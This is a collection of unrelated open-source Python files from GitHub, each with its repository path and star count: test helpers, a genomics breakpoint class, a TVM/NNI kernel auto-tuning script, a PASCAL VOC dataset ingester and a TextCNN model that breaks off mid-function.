from .streaming import * # noqa: F401, F403, E402
from .utils import LazyToStreaming # noqa: F401, E402
|
atest/testresources/listeners/ListenImports.py
|
rdagum/robotframework
| 7,073 |
88774
|
import os
try:
basestring
except NameError:
basestring = str
class ListenImports:
ROBOT_LISTENER_API_VERSION = 2
def __init__(self, imports):
self.imports = open(imports, 'w')
def library_import(self, name, attrs):
self._imported("Library", name, attrs)
def resource_import(self, name, attrs):
self._imported("Resource", name, attrs)
def variables_import(self, name, attrs):
self._imported("Variables", name, attrs)
def _imported(self, import_type, name, attrs):
self.imports.write("Imported %s\n\tname: %s\n" % (import_type, name))
for name in sorted(attrs):
self.imports.write("\t%s: %s\n" % (name, self._pretty(attrs[name])))
def _pretty(self, entry):
if isinstance(entry, list):
return '[%s]' % ', '.join(entry)
if isinstance(entry, basestring) and os.path.isabs(entry):
entry = entry.replace('$py.class', '.py').replace('.pyc', '.py')
tokens = entry.split(os.sep)
index = -1 if tokens[-1] != '__init__.py' else -2
return '//' + '/'.join(tokens[index:])
return entry
def close(self):
self.imports.close()
|
svtools/breakpoint.py
|
NeolithEra/svtools
| 120 |
88778
|
<gh_stars>100-1000
import sys
import l_bp
from exceptions import MissingProbabilitiesException
class BreakpointInterval(object):
'''
Class for storing the range and probability distribution
of a breakpoint
'''
# Constant value for slop padding
SLOP_PROB = 1e-100
def __init__(self, chrom, start, end, p):
self.chrom = chrom
self.start = start
self.end = end
self.p = p
def pad_slop(self, percent_slop, fixed_slop):
'''
Add slop to the interval
'''
slop = int(max(percent_slop * (self.end - self.start + 1), fixed_slop))
self.start -= slop
self.end += slop
self.p = [BreakpointInterval.SLOP_PROB] * slop + self.p + [BreakpointInterval.SLOP_PROB] * slop
self._trim()
self._normalize()
def _trim(self):
'''
Trim any part of range past the beginning of the chromosome
'''
if self.start < 0:
self.p = self.p[-self.start:]
self.start = 0
def _normalize(self):
'''
Normalize interval's probability to sum to 1
'''
sum_p = sum(self.p)
self.p = [float(x)/sum_p for x in self.p]
def common_range(self, other):
return max(self.start, other.start), min(self.end, other.end)
def overlap_prob(self, other, c_start, c_len):
start_off = c_start - self.start
other_start_off = c_start - other.start
ovl = 0
for i in range(c_len):
ovl += min(self.p[i + start_off], other.p[i + other_start_off])
return ovl
class Breakpoint(object):
'''
Class for storing information about Breakpoints for merging
'''
def __init__(self, line, percent_slop=0, fixed_slop=0):
'''
Initialize with slop for probabilities
'''
self.l = line
(self.sv_type,
chr_l,
chr_r,
self.strands,
start_l,
end_l,
start_r,
end_r,
m) = l_bp.split_v(line)
try:
self.left = BreakpointInterval(chr_l, start_l, end_l, self.floats_from_tag(m, 'PRPOS'))
self.right = BreakpointInterval(chr_r, start_r, end_r, self.floats_from_tag(m, 'PREND'))
except RuntimeError as e:
raise MissingProbabilitiesException(str(e))
if ((percent_slop > 0) or (fixed_slop > 0)):
self.left.pad_slop(percent_slop, fixed_slop)
self.right.pad_slop(percent_slop, fixed_slop)
def __str__(self):
'''
Convert back to a string
'''
return '\t'.join([str(x) for x in [self.left.chrom,
self.left.start,
self.left.end,
self.right.chrom,
self.right.start,
self.right.end,
self.sv_type,
self.strands,
self.left.p,
self.right.p]])
def ovl(self, b):
'''
Calculate overlapping cumulative probability value as weight?
0 if not overlapping.
'''
if ((self.left.chrom != b.left.chrom) or
(self.right.chrom != b.right.chrom) or
(self.sv_type != b.sv_type)):
return 0
#get common intervals
c_start_l, c_end_l = self.left.common_range(b.left)
c_start_r, c_end_r = self.right.common_range(b.right)
c_l_len = c_end_l - c_start_l + 1
c_r_len = c_end_r - c_start_r + 1
if (c_l_len < 1) or (c_r_len < 1):
return 0
ovl_l = self.left.overlap_prob(b.left, c_start_l, c_l_len)
ovl_r = self.right.overlap_prob(b.right, c_start_r, c_r_len)
return ovl_l * ovl_r
@staticmethod
def floats_from_tag(info_dict, tag):
if tag in info_dict:
return [float(x) for x in info_dict[tag].split(',')]
else:
raise RuntimeError('Required tag {0} not found.'.format(tag))
|
examples/trials/systems_auto_tuning/opevo/src/compiler_auto_tune_stable.py
|
dutxubo/nni
| 9,680 |
88783
|
#!/usr/bin/env python3
## TODO: optimize c-mcpu metric; early-stop handler; fp16/int8; Kill pyRPC;
import numpy as np
import tvm
import logging
import math
import re
import sys, time, subprocess, os, random, hashlib
from tvm import autotvm
import topi
import json
from topi.util import get_const_tuple
import importlib
from tvm.autotvm.task.dispatcher import ApplyConfig
from tvm.autotvm.task import ConfigEntity
from threading import Timer
backend = os.environ['BACKEND'] if 'BACKEND' in os.environ else 'c-cuda'
def system_lock(key_ids):
import socket, time
occupied_sock = None
while not occupied_sock:
for key_id in key_ids:
try:
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('127.0.0.1', 9050 + key_id))
sock.listen(1)
occupied_sock = (sock, key_id)
break
except:
try:
sock.shutdown(socket.SHUT_RDWR)
sock.close()
except:
sock.close()
if occupied_sock:
break
# print('still waiting ..')
time.sleep(0.2)
# print('Using key_id = %d' % occupied_sock[1])
sock = occupied_sock[0]
def unlock_fd():
try:
sock.shutdown(socket.SHUT_RDWR)
sock.close()
except:
sock.close()
return unlock_fd, occupied_sock[1]
def show_search_space(config_space, printable):
search_space = {}
for _, name in enumerate(config_space.space_map):
curr = config_space.space_map[name]
if (curr.__class__ == tvm.autotvm.task.space.SplitSpace):
search_space[name] = {"_type": "factor", "_value": [curr.product, curr.num_output]}
elif (curr.__class__ == tvm.autotvm.task.space.OtherOptionSpace):
search_space[name] = {"_type": "choice", "_value": [x.val for x in curr.entities]}
else:
raise Exception("Cannot recognize search space type: %s" % (config_space.space_map[name].__class__))
json_space = json.dumps(search_space)
print("\n>> Search Space = %s" % json_space)
if printable:
print("\n>> Writing Search Space to './search_space.json'..")
with open("search_space.json", "w") as fp:
fp.write(json_space)
print("\n>> Done")
sys.exit(0)
def get_tuning_parallism():
if 'DEV_NUM' in os.environ:
dev_num = int(os.environ['DEV_NUM'])
else:
if backend in ['c-rocm', '#rocm']:
devices = subprocess.getoutput('/opt/rocm/bin/rocm_agent_enumerator | grep -v gfx000').split()
if not devices:
raise Exception("Not valid rocm device found.")
dev_num = len(devices)
elif backend in ['c-cuda', '#cuda']:
devices = subprocess.getoutput('ls /dev/nvidia[0-9]* 2>/dev/null').split()
if not devices:
raise Exception("Not valid rocm device found.")
dev_num = len(devices)
else:
raise Exception("Unrecognized backend: %s" % backend)
print(' >> Tuning parallism = %d' % dev_num)
return dev_num
def local_get_dir_file(rel_file, dir_sid=None):
if not dir_sid:
dir_sid = os.environ['DIR_SID'] if 'DIR_SID' in os.environ else '_'
dir_space = '/tmp/tvm_autotvm_engine'
os.system('mkdir -p "%s/%s"' % (dir_space, dir_sid))
return "%s/%s/%s" % (dir_space, dir_sid, rel_file)
def run_process_with_timeout(args, timeout=None, envs=None):
try:
proc = subprocess.Popen(args, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, env=envs)
retcode = proc.wait(timeout=timeout)
return retcode == 0
except subprocess.TimeoutExpired:
print('Timed out - killing', proc.pid)
proc.kill()
return False
def parse_launch_bounds(code):
func_arr = code.split('extern "C" __global__ ')
for i in range(1, len(func_arr)):
axis_map = dict()
lines = func_arr[i].split('\n')
for it in lines:
if it.startswith(' // [thread_extent] '):
words = it.split(' ')
nthread = int(words[-1])
axis = words[-3]
if axis in axis_map:
if axis_map[axis] != nthread:
assert(False)
else:
axis_map[axis] = nthread
block_bound = axis_map.get('threadIdx.x', 1) * axis_map.get('threadIdx.y', 1) * axis_map.get('threadIdx.z', 1)
func_arr[i] = 'extern "C" __global__ __launch_bounds__(%d) %s' % (block_bound, func_arr[i])
code = ''.join(func_arr)
return code
def translate_code(code):
if backend == 'c-rocm':
code = parse_launch_bounds(code)
code = '#include <hip/hip_runtime.h>\n#include <hip/hip_fp16.h>\n\n'+ code.replace('(__shared__ float4*)', '(float4*)').replace('#include <cuda_fp16.h>', '').replace('typedef unsigned long long uint64_t;', '')
elif backend in ['#cuda', 'c-cuda']:
code = parse_launch_bounds(code)
code = '#include <cuda_runtime.h>\n#include <cuda_fp16.h>\n\n' + code
else:
raise Exception("Unrecognized backend: %s" % backend)
return code
@tvm.register_func
def tvm_callback_backend_proc(code):
native_code = translate_code(code)
# Compile code
module_data = None
if backend == 'c-rocm':
gcn_arch = subprocess.getoutput('/opt/rocm/bin/rocm_agent_enumerator | sort | uniq | grep -v gfx000 | tail -n 1').strip()
if not gcn_arch:
raise RuntimeError("Compilation error: no valid gcn_arch gpu detected!")
temp_code = local_get_dir_file("my_kernel.cc")
temp_cobj = local_get_dir_file("my_kernel.hsaco")
args = ['/opt/rocm/bin/lpl', temp_code, '-t=' + gcn_arch, '-f="-Wno-ignored-attributes -D__HIP_PLATFORM_HCC__=1"', '-o', temp_cobj]
elif backend in ['#cuda', 'c-cuda']:
temp_code = local_get_dir_file("my_kernel.cu")
temp_cobj = local_get_dir_file("my_kernel.ptx")
args = ['/usr/local/cuda/bin/nvcc', temp_code, '--ptx', '-O3', '-o', temp_cobj]
else:
raise Exception("Unrecognized backend: %s" % backend)
with open(temp_code, 'w') as fp:
fp.write(native_code)
print('[Build @%x]' % os.getpid(), ' '.join(args))
if not run_process_with_timeout(args, 10):
raise Exception("Compilation failed or time limit exceeded")
if module_data is None:
module_data = bytearray(open(temp_cobj, "rb").read())
return module_data
def run_config_entity(params_given, dir_sid, expected_timecost='inf', tune_slot_id=0):
dir_sid = str(dir_sid)
result_file = local_get_dir_file('result.txt', dir_sid)
try:
os.remove(result_file)
except:
pass
config_str = json.dumps(params_given)
envs = os.environ.copy()
envs['CONFIG'] = config_str
envs['DIR_SID'] = dir_sid
envs['CUDA_VISIBLE_DEVICES'] = str(tune_slot_id)
print(" >> Try param_entity on sid = %s: config = %s, slot_id = %d" % (dir_sid, config_str, tune_slot_id))
try:
assert(True == run_process_with_timeout(["python%d" % sys.version_info.major] + sys.argv, envs=envs))
result = float(open(result_file, 'r').read().strip())
except:
result = float('inf')
print(" >> Try param_entity on sid = %s: result = `%.6f`" % (dir_sid, result))
return result
def compute_gflops(flop, t):
return flop / (t * 1e3) / 1e6
def search_op_config(code_only=False):
tvm_target = 'cuda'
logging.getLogger('autotvm').setLevel(logging.DEBUG)
logging.getLogger('autotvm').addHandler(logging.StreamHandler(sys.stdout))
default_tune_op = importlib.import_module('templates.' + (os.environ['OP']))
print(' >> Backend = %s, Python PID = %s, Task = %s;' % (backend, os.getpid(), default_tune_op.__name__))
task = autotvm.task.create(default_tune_op.get_template_op, args=(), target=tvm_target)
op_attributes = default_tune_op.op_attributes
op_summary = '_'.join([k + str(op_attributes[k]) for k in op_attributes])
def json_to_config(json_dict):
config = ConfigEntity.from_json_dict({"i": -1, "t": "", "c": None, "e": json_dict})
return config
def config_to_json(config):
jobj = config.to_json_dict()['e']
json_dict = dict()
for i in range(len(jobj)):
assert(jobj[i][1] in ['sp', 'ot'])
json_dict[jobj[i][0]] = jobj[i][2]
return json_dict
num_trials = int(os.environ['STEP']) if 'STEP' in os.environ else 0
if 'CONFIG' in os.environ:
params_given = json.loads(os.environ['CONFIG'])
print("====>> [Current Config Option]", os.environ['CONFIG'])
trial_config = []
for key in params_given:
trial_config.append([key, "sp" if type(params_given[key]) is list else "ot", params_given[key]])
best_config = json_to_config(trial_config)
elif 'NNI_TRIAL_JOB_ID' in os.environ:
show_search_space(task.config_space, os.environ['NNI_TRIAL_JOB_ID'] == '@')
import nni
params_given = nni.get_next_parameter()
if params_given is None:
raise
local_dir_id = os.environ['NNI_TRIAL_JOB_ID']
t = run_config_entity(params_given, local_dir_id)
gflops = compute_gflops(task.flop, t)
print('[TVM-engine] Final entity result is: %g' % gflops)
try:
nni.report_final_result(gflops)
except:
print('[TVM-engine] (not reporting final result to NNI.)')
exit(0)
elif num_trials > 0:
n_parallel = 16 if 'BATCH' not in os.environ else int(os.environ['BATCH'])
measure_option = autotvm.measure_option(
builder=autotvm.LocalBuilder(n_parallel=n_parallel),
runner=autotvm.LocalRunner(repeat=3, min_repeat_ms=100, timeout=4)
)
# if DO_TUNING:
tuner = autotvm.tuner.XGBTuner(task, num_threads=8)
from concurrent.futures import ThreadPoolExecutor
thread_pool = ThreadPoolExecutor(max_workers=n_parallel)
dev_num = get_tuning_parallism()
def parse_configs(task, configs):
results = []
futures = []
expected_timecost = 'inf'
for i in range(len(configs)):
futures.append(thread_pool.submit(run_config_entity, config_to_json(configs[i]), i, expected_timecost, i % dev_num))
for i in range(len(configs)):
t = futures[i].result()
if t < tuner.task.best_config[0]:
tuner.task.best_config = (t, configs[i])
results.append(autotvm.measure.MeasureResult(costs=(t,), error_no=0, all_cost=i, timestamp=time.time()))
return results
tuner.task.best_config = (float('inf'), None)
tuner.parse_configs = parse_configs
tuner.tune(n_trial=num_trials, measure_option=measure_option, callbacks=[])
assert(not math.isinf(tuner.task.best_config[0]))
best_config = tuner.task.best_config[1]
print('\n[Best Config]', json.dumps(config_to_json(best_config)))
else:
best_config = task.config_space
with ApplyConfig(best_config):
with tvm.target.create(tvm_target):
s, arg_bufs = default_tune_op.get_template_op()
lower_source = str(tvm.lower(s, arg_bufs, simple_mode=True))
# Verify Source Code
assert(len(('\n' + lower_source).split('\nproduce ')) == 2)
lower_file = local_get_dir_file('my_kernel.lower')
with open(lower_file, 'w') as fp:
fp.write(lower_source)
max_threads_per_block = tvm.ndarray.gpu(0).max_threads_per_block
max_shared_memory_per_block = tvm.ndarray.gpu(0).max_shared_memory_per_block
thread_extents = subprocess.getoutput("cat '%s' | grep '^ *// attr.*iter_var.*thread_extent'" % (lower_file)).split('\n')
reserved_axes = dict({'threadIdx.x': None, 'threadIdx.y': None, 'threadIdx.z': None, 'blockIdx.x': None, 'blockIdx.y': None, 'blockIdx.z': None})
for line in thread_extents:
thread_name = line.split('[iter_var(')[-1].split(',')[0]
if thread_name in reserved_axes:
thread_val = int(line.split('thread_extent = ')[-1])
if reserved_axes[thread_name] is not None:
if reserved_axes[thread_name] != thread_val:
assert(False)
else:
reserved_axes[thread_name] = thread_val
else:
raise Exception("Invalid thread_axis name: %s" % thread_name)
num_threads = 1
for thread_name in ['threadIdx.x', 'threadIdx.y', 'threadIdx.z']:
if reserved_axes[thread_name] is not None:
num_threads *= reserved_axes[thread_name]
if num_threads > max_threads_per_block:
raise Exception("Invalid kernel code: using num_threads %d > max_threads_per_block %d" % (num_threads, max_threads_per_block))
allocate_shared = subprocess.getoutput("cat '%s' | grep 'allocate .*shared\[.*\]'" % (lower_file)).split('\n')
shared_memory_in_bytes = 0
for line in allocate_shared:
if not line:
continue
parts = line.split('[')
assert(len(parts) == 2)
parts = parts[1].split(' * ')
assert(len(parts) == 2)
assert(parts[1][-1] == ']')
allocate_type = parts[0]
allocate_val = int(parts[1][:-1])
if allocate_type in ['float32']:
shared_memory_in_bytes += allocate_val * 4
else:
raise Exception("Unrecognized shared memory data type: %s" % allocate_type)
if shared_memory_in_bytes > max_shared_memory_per_block:
raise Exception("Invalid kernel code: using shared_memory_in_bytes %d > max_shared_memory_per_block %d" % (shared_memory_in_bytes, max_shared_memory_per_block))
func = tvm.build(s, arg_bufs, tvm_target, name='template_op')
assert(len(func.imported_modules) == 1)
device_source = translate_code(func.imported_modules[0].get_source())
if code_only:
return device_source
if lower_source and device_source:
tune_slot_id = 0 if 'CUDA_VISIBLE_DEVICES' not in os.environ else int(os.environ['CUDA_VISIBLE_DEVICES'])
exec_fd, _ = system_lock([tune_slot_id])
gpu_id = 0
ctx = tvm.context(tvm_target, gpu_id)
tensors, outs = [], []
for arg in arg_bufs:
shape = [int(x) for x in arg.shape]
is_output = arg.op.__class__ != tvm.tensor.PlaceholderOp
from tvm._ffi.ndarray import empty
td = empty(shape, arg.dtype, ctx)
if is_output:
outs.append(td)
tensors.append(td)
def timeout_handler():
print("Error: Timeout during Kernel warmup")
os._exit(1)
my_timer = Timer(10, timeout_handler, [])
my_timer.start()
# Warmup
func(*tensors)
tvm.ndarray.gpu(gpu_id).sync()
# Estimate
t_start = time.time()
func(*tensors)
tvm.ndarray.gpu(gpu_id).sync()
t_diff = time.time() - t_start
my_timer.cancel()
del my_timer
num_runs = max(3, min(100, math.floor(1.0 / t_diff)))
timeout_seconds = math.ceil((num_runs + 5) * t_diff)
my_timer = Timer(timeout_seconds, timeout_handler, [])
my_timer.start()
timer_f = func.time_evaluator(func.entry_name, ctx, number=num_runs)
t = timer_f(*tensors).mean
my_timer.cancel()
exec_fd()
gflops = compute_gflops(task.flop, t)
print("[TVM-engine] Average time cost of %d runs = %g ms, %g gflops." % (num_runs, t * 1e3, gflops))
with open(local_get_dir_file('result.txt'), 'w') as fp:
fp.write(str(t))
if __name__ == '__main__':
try:
search_op_config()
except SystemExit:
sys.exit(0)
except:
import traceback
traceback.print_exc()
|
pybrain/structure/connections/__init__.py
|
sveilleux1/pybrain
| 2,208 |
88819
|
<filename>pybrain/structure/connections/__init__.py
from pybrain.structure.connections.full import FullConnection
from pybrain.structure.connections.identity import IdentityConnection
from pybrain.structure.connections.shared import SharedFullConnection, MotherConnection, SharedConnection
from pybrain.structure.connections.linear import LinearConnection
from pybrain.structure.connections.fullnotself import FullNotSelfConnection
|
examples/alias.py
|
wyfo/apimodel
| 118 |
88830
|
<filename>examples/alias.py
from dataclasses import dataclass, field
from apischema import alias, deserialize, serialize
from apischema.json_schema import deserialization_schema
@dataclass
class Foo:
class_: str = field(metadata=alias("class"))
assert deserialization_schema(Foo) == {
"$schema": "http://json-schema.org/draft/2020-12/schema#",
"additionalProperties": False,
"properties": {"class": {"type": "string"}},
"required": ["class"],
"type": "object",
}
assert deserialize(Foo, {"class": "bar"}) == Foo("bar")
assert serialize(Foo, Foo("bar")) == {"class": "bar"}
|
llvm/utils/lit/tests/Inputs/googletest-upstream-format/DummySubDir/OneTest.py
|
medismailben/llvm-project
| 4,812 |
88834
|
<reponame>medismailben/llvm-project
#!/usr/bin/env python
import sys
if len(sys.argv) != 2:
raise ValueError("unexpected number of args")
if sys.argv[1] == "--gtest_list_tests":
print("""\
Running main() from gtest_main.cc
FirstTest.
subTestA
subTestB
ParameterizedTest/0.
subTest
ParameterizedTest/1.
subTest""")
sys.exit(0)
elif not sys.argv[1].startswith("--gtest_filter="):
raise ValueError("unexpected argument: %r" % (sys.argv[1]))
test_name = sys.argv[1].split('=',1)[1]
print('Running main() from gtest_main.cc')
if test_name == 'FirstTest.subTestA':
print('I am subTest A, I PASS')
print('[ PASSED ] 1 test.')
sys.exit(0)
elif test_name == 'FirstTest.subTestB':
print('I am subTest B, I FAIL')
print('And I have two lines of output')
sys.exit(1)
elif test_name in ('ParameterizedTest/0.subTest',
'ParameterizedTest/1.subTest'):
print('I am a parameterized test, I also PASS')
print('[ PASSED ] 1 test.')
sys.exit(0)
else:
raise SystemExit("error: invalid test name: %r" % (test_name,))
|
examples/ssd/datasets/ingest_pascalvoc.py
|
rsketine/neon
| 4,415 |
88849
|
<reponame>rsketine/neon<gh_stars>1000+
#!/usr/bin/env python
# ******************************************************************************
# Copyright 2017-2018 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ******************************************************************************
from argparse import ArgumentParser
from convert_xml_to_json import convert_xml_to_json
import numpy as np
import os
import tarfile
import ingest_utils as util
from collections import OrderedDict
from tqdm import tqdm
from neon.util.persist import get_data_cache_or_nothing
def get_ssd_config(img_reshape, inference=False):
ssd_config = OrderedDict()
ssd_config['batch_size'] = 32
ssd_config['shuffle_enable'] = True
ssd_config['shuffle_manifest'] = True
if inference:
ssd_config['batch_size'] = 1
ssd_config['block_size'] = 50
ssd_config['cache_directory'] = get_data_cache_or_nothing(subdir='pascalvoc_cache')
ssd_config["etl"] = [{
"type": "localization_ssd",
"height": img_reshape[0],
"width": img_reshape[1],
"max_gt_boxes": 500,
"class_names": ["__background__", "aeroplane", "bicycle", "bird", "boat",
"bottle", "bus", "car", "cat", "chair", "cow", "diningtable",
"dog", "horse", "motorbike", "person", "pottedplant",
"sheep", "sofa", "train", "tvmonitor"]
}, {
"type": "image",
"height": img_reshape[0],
"width": img_reshape[1],
"channels": 3
}]
if not inference:
ssd_config["augmentation"] = [{
"type": "image",
"crop_enable": False,
"flip_enable": True,
"expand_ratio": [1., 4.],
"expand_probability": 0.5,
# "emit_constraint_type": "center", TODO: enable when adds support for no gt boxes
"brightness": [0.9, 1.1],
"hue": [-18, 18],
"saturation": [0.9, 1.1],
"contrast": [0.9, 1.1],
"batch_samplers":
[
{
"max_sample": 1,
"max_trials": 1
},
{
"max_sample": 1,
"max_trials": 50,
"sampler": {"scale": [0.3, 1.0], "aspect_ratio": [0.5, 2.0]},
"sample_constraint": {"min_jaccard_overlap": 0.1}
},
{
"max_sample": 1,
"max_trials": 50,
"sampler": {"scale": [0.3, 1.0], "aspect_ratio": [0.5, 2.0]},
"sample_constraint": {"min_jaccard_overlap": 0.3}
},
{
"max_sample": 1,
"max_trials": 50,
"sampler": {"scale": [0.3, 1.0], "aspect_ratio": [0.5, 2.0]},
"sample_constraint": {"min_jaccard_overlap": 0.5}
},
{
"max_sample": 1,
"max_trials": 50,
"sampler": {"scale": [0.3, 1.0], "aspect_ratio": [0.5, 2.0]},
"sample_constraint": {"min_jaccard_overlap": 0.7}
},
{
"max_sample": 1,
"max_trials": 50,
"sampler": {"scale": [0.3, 1.0], "aspect_ratio": [0.5, 2.0]},
"sample_constraint": {"min_jaccard_overlap": 0.9}
},
{
"max_sample": 1,
"max_trials": 50,
"sampler": {"scale": [0.3, 1.0], "aspect_ratio": [0.5, 2.0]},
"sample_constraint": {"max_jaccard_overlap": 1.0, "min_jaccard_overlap": 0.1}
}
]
}]
if img_reshape == (300, 300):
ssd_config['ssd_config'] = OrderedDict(
[('conv4_3', {'min_sizes': 30.0, 'max_sizes': 60.0,
'aspect_ratios': 2.0, 'step': 8, 'normalize': True}),
('fc7', {'min_sizes': 60.0, 'max_sizes': 111.0,
'aspect_ratios': (2.0, 3.0), 'step': 16}),
('conv6_2', {'min_sizes': 111.0, 'max_sizes': 162.0,
'aspect_ratios': (2.0, 3.0), 'step': 32}),
('conv7_2', {'min_sizes': 162.0, 'max_sizes': 213.0,
'aspect_ratios': (2.0, 3.0), 'step': 64}),
('conv8_2', {'min_sizes': 213.0, 'max_sizes': 264.0,
'aspect_ratios': 2.0, 'step': 100}),
('conv9_2', {'min_sizes': 264.0, 'max_sizes': 315.0,
'aspect_ratios': 2.0, 'step': 300})])
elif img_reshape == (512, 512):
ssd_config['ssd_config'] = OrderedDict(
[('conv4_3', {'min_sizes': 35.84, 'max_sizes': 76.80,
'aspect_ratios': 2.0, 'step': 8, 'normalize': True}),
('fc7', {'min_sizes': 76.80, 'max_sizes': 153.6,
'aspect_ratios': (2.0, 3.0), 'step': 16}),
('conv6_2', {'min_sizes': 153.6, 'max_sizes': 230.4,
'aspect_ratios': (2.0, 3.0), 'step': 32}),
('conv7_2', {'min_sizes': 230.4, 'max_sizes': 307.2,
'aspect_ratios': (2.0, 3.0), 'step': 64}),
('conv8_2', {'min_sizes': 307.2, 'max_sizes': 384.0,
'aspect_ratios': 2.0, 'step': 128}),
('conv9_2', {'min_sizes': 384.0, 'max_sizes': 460.8,
'aspect_ratios': 2.0, 'step': 256}),
('conv10_2', {'min_sizes': 460.8, 'max_sizes': 537.8,
'aspect_ratios': 2.0, 'step': 512})])
else:
raise ValueError("Image shape of {} not supported.".format(img_reshape))
return ssd_config
def extract_tarfiles(tarfiles, out_dir):
for file in tarfiles:
with tarfile.open(file, 'r') as t:
print("Extracting {} to {}".format(file, out_dir))
t.extractall(out_dir)
def get_tag_list(index_file):
with open(index_file) as f:
tag_list = [tag.rstrip(os.linesep) for tag in f]
return tag_list
def ingest_pascal(data_dir, out_dir, img_reshape=(300, 300), overwrite=False, skip_untar=False):
assert img_reshape is not None, "Target image reshape required."
hw = '{}x{}'.format(img_reshape[0], img_reshape[1])
datasets = ['VOC2007', 'VOC2012']
tar_files = {'VOC2007': ['VOCtrainval_06-Nov-2007.tar', 'VOCtest_06-Nov-2007.tar'],
'VOC2012': ['VOCtrainval_11-May-2012.tar']}
index_name = {'trainval': 'trainval.txt', 'test': 'test.txt'}
manifest = {'trainval': [], 'test': []}
root_dir = os.path.join(out_dir, 'VOCdevkit')
train_manifest = os.path.join(root_dir, 'train_{}.csv'.format(hw))
val_manifest = os.path.join(root_dir, 'val_{}.csv'.format(hw))
if os.path.exists(train_manifest) and os.path.exists(val_manifest) and not overwrite:
print("Manifest files already found, skipping ingest.")
print("Use --overwrite flag to force re-ingest.")
return
for year in datasets:
tags = {'trainval': [], 'test': []}
# define paths
if skip_untar is False:
tarfiles = [os.path.join(data_dir, tar) for tar in tar_files[year]]
extract_tarfiles(tarfiles, out_dir)
# read the index files and build a list of tags to process
# in PASCALVOC, each tag (e.g. '000032') refers to an image (000032.jpg)
# and an annotation XML file (000032.xml)
for sets in index_name.keys():
index_file = os.path.join(root_dir, year, 'ImageSets', 'Main', index_name[sets])
if os.path.exists(index_file):
tag_list = get_tag_list(index_file)
tags[sets].extend(tag_list)
print('Found {} images in {}'.format(len(tag_list), index_file))
img_folder = os.path.join(root_dir, year, 'JPEGImages')
annot_folder = os.path.join(root_dir, year, 'Annotations')
# create data folders to save converted images and annotations
target_img_folder = os.path.join(root_dir, year, 'JPEGImages-converted')
target_annot_folder = os.path.join(root_dir, year, 'Annotations-json')
print('Processing {}'.format(year))
util.make_dir(target_img_folder)
util.make_dir(target_annot_folder)
all_tags = tags['trainval'] + tags['test'] # process all the tags in our index files.
for tag in tqdm(all_tags):
image = os.path.join(img_folder, tag + '.jpg')
annot = os.path.join(annot_folder, tag + '.xml')
assert os.path.exists(image)
assert os.path.exists(annot)
target_image = os.path.join(target_img_folder, tag + '.jpg')
target_annot = os.path.join(target_annot_folder, tag + '.json')
# convert the annotations to json, including difficult objects
convert_xml_to_json(annot, target_annot, difficult=True, img_reshape=None)
util.resize_image(image, target_image, img_reshape=None)
if tag in tags['trainval']:
manifest['trainval'].append((target_image, target_annot))
elif tag in tags['test']:
manifest['test'].append((target_image, target_annot))
np.random.seed(0)
np.random.shuffle(manifest['trainval'])
util.create_manifest(train_manifest, manifest['trainval'], root_dir)
util.create_manifest(val_manifest, manifest['test'], root_dir)
# write SSD CONFIG
ssd_config = get_ssd_config(img_reshape)
ssd_config_path = os.path.join(root_dir, 'pascalvoc_ssd_{}.cfg'.format(hw))
util.write_ssd_config(ssd_config, ssd_config_path, True)
# write SSD VAL CONFIG
ssd_config_val = get_ssd_config(img_reshape, True)
ssd_config_path_val = os.path.join(root_dir, 'pascalvoc_ssd_{}_val.cfg'.format(hw))
util.write_ssd_config(ssd_config_val, ssd_config_path_val, True)
config_path = os.path.join(root_dir, 'pascalvoc_{}.cfg'.format(hw))
config = {'manifest': '[train:{}, val:{}]'.format(train_manifest, val_manifest),
'manifest_root': root_dir,
'epochs': 230,
'height': img_reshape[0],
'width': img_reshape[1],
'ssd_config': '[train:{}, val:{}]'.format(ssd_config_path, ssd_config_path_val)
}
util.write_config(config, config_path)
if __name__ == '__main__':
parser = ArgumentParser()
parser.add_argument('--input_dir', required=True, help='path to directory with vocdevkit data')
parser.add_argument('--output_dir', required=True, help='output directory')
parser.add_argument('--overwrite', action='store_true', help='overwrite files')
parser.add_argument('--height', type=int, default=300, help='height of reshaped image')
parser.add_argument('--width', type=int, default=300, help='width of reshape image')
parser.add_argument('--skip_untar', action='store_true',
help='skip the untar. Use if unzipped files already exist.')
args = parser.parse_args()
ingest_pascal(args.input_dir, args.output_dir, img_reshape=(args.height, args.width),
overwrite=args.overwrite, skip_untar=args.skip_untar)
|
Model_TextCNN/old_code/model.py
|
DmytroBabenko/Text-Classification-Models-Pytorch
| 481 |
88858
|
# model.py
import torch
from torch import nn
from torch import Tensor
from torch.autograd import Variable
import numpy as np
from sklearn.metrics import accuracy_score
class CNNText(nn.Module):
def __init__(self, config):
super(CNNText, self).__init__()
self.config = config
# Convolutional Layer
# We use 3 kernels as in original paper
# Size of kernels: (3,300),(4,300),(5,300)
self.conv1 = nn.Conv2d(in_channels=self.config.in_channels, out_channels=self.config.num_channels,
kernel_size=(self.config.kernel_size[0],self.config.embed_size),
stride=1, padding=0)
self.activation1 = nn.ReLU()
self.max_out1 = nn.MaxPool1d(self.config.max_sen_len - self.config.kernel_size[0]+1)
self.conv2 = nn.Conv2d(in_channels=self.config.in_channels, out_channels=self.config.num_channels,
kernel_size=(self.config.kernel_size[1],self.config.embed_size),
stride=1, padding=0)
self.activation2 = nn.ReLU()
self.max_out2 = nn.MaxPool1d(self.config.max_sen_len - self.config.kernel_size[1]+1)
self.conv3 = nn.Conv2d(in_channels=self.config.in_channels, out_channels=self.config.num_channels,
kernel_size=(self.config.kernel_size[2],self.config.embed_size),
stride=1, padding=0)
self.activation3 = nn.ReLU()
self.max_out3 = nn.MaxPool1d(self.config.max_sen_len - self.config.kernel_size[2]+1)
self.dropout = nn.Dropout(self.config.dropout_keep)
# Fully-Connected Layer
self.fc = nn.Linear(self.config.num_channels*len(self.config.kernel_size), self.config.output_size)
# Softmax non-linearity
self.softmax = nn.Softmax()
def forward(self, x):
x = x.unsqueeze(1) # (batch_size,max_seq_len,embed_size) => (batch_size,1,max_seq_len,embed_size)
conv_out1 = self.conv1(x).squeeze(3)
